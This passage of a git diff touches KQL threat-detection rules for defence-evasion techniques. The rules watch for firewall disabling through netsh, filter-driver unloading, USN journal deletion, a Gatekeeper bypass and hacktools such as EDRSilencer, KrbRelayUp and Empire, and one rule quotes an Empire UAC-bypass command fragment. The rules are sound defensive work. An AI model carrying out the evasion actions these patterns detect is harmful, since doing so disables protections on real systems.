"\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\wuauclt.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql index 21ae1916..2af0dd67 100644 --- a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql +++ b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql @@ -1,10 +1,10 @@ -// Title: Filter Driver Unloaded Via Fltmc.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-13 -// Level: medium -// Description: Detect filter driver unloading activity via fltmc.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 - -DeviceProcessEvents +// Title: Filter Driver Unloaded Via Fltmc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-13 +// Level: medium +// Description: Detect filter driver unloading activity via fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not((((ProcessCommandLine endswith "unload rtp_filesystem_filter" or ProcessCommandLine endswith "unload rtp_filter") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\") and InitiatingProcessFolderPath endswith "\\endpoint-protection-installer-x64.tmp") or (ProcessCommandLine endswith "unload DFMFilter" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql index efa1b78c..193ef27c 100644 --- a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql +++ b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql @@ -1,10 +1,10 @@ -// Title: Findstr Launching .lnk File -// Author: Trent Liffick -// Date: 2020-05-01 -// Level: medium -// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003 - -DeviceProcessEvents +// Title: Findstr Launching .lnk File +// Author: Trent Liffick +// Date: 2020-05-01 +// Level: medium +// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003 + +DeviceProcessEvents | where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql index d8be9c5c..926ed3d7 100644 --- a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql @@ -1,12 +1,12 @@ -// Title: Firewall Disabled via Netsh.EXE -// Author: Fatih Sirin -// Date: 2019-11-01 -// Level: medium -// Description: Detects netsh commands that turns off the Windows firewall -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108 -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: Firewall Disabled via Netsh.EXE +// Author: Fatih Sirin +// Date: 2019-11-01 +// Level: medium +// Description: Detects netsh commands that turns off the Windows firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql index 50e6d47e..7eff5b8e 100644 --- a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql @@ -1,13 +1,13 @@ -// Title: Firewall Rule Deleted Via Netsh.EXE -// Author: frack113 -// Date: 2022-08-14 -// Level: medium -// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Legitimate administration activity -// - Software installations and removal - -DeviceProcessEvents +// Title: Firewall Rule Deleted Via Netsh.EXE +// Author: frack113 +// Date: 2022-08-14 +// Level: medium +// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents | where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"" and InitiatingProcessFolderPath endswith "\\instup.exe") or (ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql index 2cf9e702..36d47e3b 100644 --- a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql @@ -1,13 +1,13 @@ -// Title: Firewall Rule Update Via Netsh.EXE -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-18 -// Level: medium -// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate administration activity -// - Software installations and removal - -DeviceProcessEvents +// Title: Firewall Rule Update Via Netsh.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents | where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql index 1a816e52..10a4fa07 100644 --- a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql +++ b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql @@ -1,12 +1,12 @@ -// Title: Flush Iptables Ufw Chain -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-01-18 -// Level: medium -// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Network administrators - -DeviceProcessEvents +// Title: Flush Iptables Ufw Chain +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-18 +// Level: medium +// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Network administrators + +DeviceProcessEvents | where (FolderPath endswith "/iptables" or FolderPath endswith "/xtables-legacy-multi" or FolderPath endswith "/iptables-legacy-multi" or FolderPath endswith "/ip6tables" or FolderPath endswith "/ip6tables-legacy-multi") and (ProcessCommandLine contains "-F" or ProcessCommandLine contains "-Z" or ProcessCommandLine contains "-X") and (ProcessCommandLine contains "ufw-logging-deny" or ProcessCommandLine contains "ufw-logging-allow" or ProcessCommandLine contains "ufw6-logging-deny" or ProcessCommandLine contains "ufw6-logging-allow") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql index 0d178633..bc92427d 100644 --- a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql +++ b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql @@ -1,12 +1,12 @@ -// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-05 -// Level: high -// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administrators removing applications (should always be investigated) - -DeviceRegistryEvents +// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators removing applications (should always be investigated) + +DeviceRegistryEvents | where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql index a50dfd4c..4d64af1a 100644 --- a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql +++ b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql @@ -1,10 +1,10 @@ -// Title: Forfiles.EXE Child Process Masquerading -// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati -// Date: 2024-01-05 -// Level: high -// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Forfiles.EXE Child Process Masquerading +// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati +// Date: 2024-01-05 +// Level: high +// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql index 54cd8cbb..982a1eb1 100644 --- a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql +++ b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql @@ -1,14 +1,14 @@ -// Title: Fsutil Suspicious Invocation -// Author: Ecco, E.M. Anhaus, oscd.community -// Date: 2019-09-26 -// Level: high -// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). -// Might be used by ransomwares during the attack (seen by NotPetya and others). -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485 -// False Positives: -// - Admin activity -// - Scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Fsutil Suspicious Invocation +// Author: Ecco, E.M. Anhaus, oscd.community +// Date: 2019-09-26 +// Level: high +// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). +// Might be used by ransomwares during the attack (seen by NotPetya and others). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql index a6c7ac31..a5ade537 100644 --- a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql +++ b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql @@ -1,12 +1,12 @@ -// Title: Gatekeeper Bypass via Xattr -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: low -// Description: Detects macOS Gatekeeper bypass via xattr utility -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.001 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Gatekeeper Bypass via Xattr +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects macOS Gatekeeper bypass via xattr utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where (ProcessCommandLine contains "-d" and ProcessCommandLine contains "com.apple.quarantine") and FolderPath endswith "/xattr" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/gpscript_execution.kql b/KQL/rules/Defense Evasion/gpscript_execution.kql index 00f02a38..cb2b5d51 100644 --- a/KQL/rules/Defense Evasion/gpscript_execution.kql +++ b/KQL/rules/Defense Evasion/gpscript_execution.kql @@ -1,12 +1,12 @@ -// Title: Gpscript Execution -// Author: frack113 -// Date: 2022-05-16 -// Level: medium -// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate uses of logon scripts distributed via group policy - -DeviceProcessEvents +// Title: Gpscript Execution +// Author: frack113 +// Date: 2022-05-16 +// Level: medium +// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate uses of logon scripts distributed via group policy + +DeviceProcessEvents | where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql index 36d60cb5..96e5944c 100644 --- a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql +++ b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql @@ -1,10 +1,10 @@ -// Title: Greedy File Deletion Using Del -// Author: frack113 , X__Junior (Nextron Systems) -// Date: 2021-12-02 -// Level: medium -// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceProcessEvents +// Title: Greedy File Deletion Using Del +// Author: frack113 , X__Junior (Nextron Systems) +// Date: 2021-12-02 +// Level: medium +// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql index 9ea10c77..e22e42cd 100644 --- a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - EDRSilencer Execution -// Author: @gott_cyber -// Date: 2024-01-02 -// Level: high -// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - EDRSilencer Execution +// Author: @gott_cyber +// Date: 2024-01-02 +// Level: high +// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql index 905d51f1..aee6f0a8 100644 --- a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql +++ b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Empire PowerShell UAC Bypass -// Author: Ecco -// Date: 2019-08-30 -// Level: critical -// Description: Detects some Empire PowerShell UAC bypass methods -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 - -DeviceProcessEvents +// Title: HackTool - Empire PowerShell UAC Bypass +// Author: Ecco +// Date: 2019-08-30 +// Level: critical +// Description: Detects some Empire PowerShell UAC bypass methods +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceProcessEvents | where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql index 74133563..65e034c6 100644 --- a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql +++ b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql @@ -1,10 +1,10 @@ -// Title: HackTool - F-Secure C3 Load by Rundll32 -// Author: Alfie Champion (ajpc500) -// Date: 2021-06-02 -// Level: critical -// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: HackTool - F-Secure C3 Load by Rundll32 +// Author: Alfie Champion (ajpc500) +// Date: 2021-06-02 +// Level: critical +// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql index 6294992f..aaa0de88 100644 --- a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - GMER Rootkit Detector and Remover Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-05 -// Level: high -// Description: Detects the execution GMER tool based on image and hash fields. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - GMER Rootkit Detector and Remover Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-05 +// Level: high +// Description: Detects the execution GMER tool based on image and hash fields. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\gmer.exe" or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql index e32386a6..98a34c4e 100644 --- a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - KrbRelayUp Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-26 -// Level: high -// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - KrbRelayUp Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-26 +// Level: high +// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql index 199077a2..cb3a9825 100644 --- a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - PowerTool Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-11-29 -// Level: high -// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - PowerTool Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-29 +// Level: high +// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql index 6260e800..5a850327 100644 --- a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Rubeus Execution -// Author: 